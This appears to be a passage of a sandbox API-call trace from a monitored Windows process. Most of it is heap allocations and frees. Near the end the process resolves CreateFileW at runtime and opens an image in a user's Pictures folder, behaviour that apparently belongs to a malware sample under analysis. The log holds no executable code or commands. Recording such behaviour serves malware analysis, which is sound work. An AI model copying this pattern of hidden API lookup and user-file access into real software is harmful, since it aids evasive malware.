0x43e2300 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0088.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b90 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0088.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0088.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0088.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0088.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0088.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0088.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0088.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0088.210] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0088.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0088.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0088.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0088.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0088.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0088.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0088.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0088.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0088.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0088.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0088.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0088.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0088.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0088.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0088.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.213] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.216] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca298 [0088.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca298, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0088.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.216] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0088.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0088.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0088.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0088.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0088.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0088.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0088.217] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\GbOsv53gLsdhP15shLc.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\gbosv53glsdhp15shlc.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0088.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0088.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 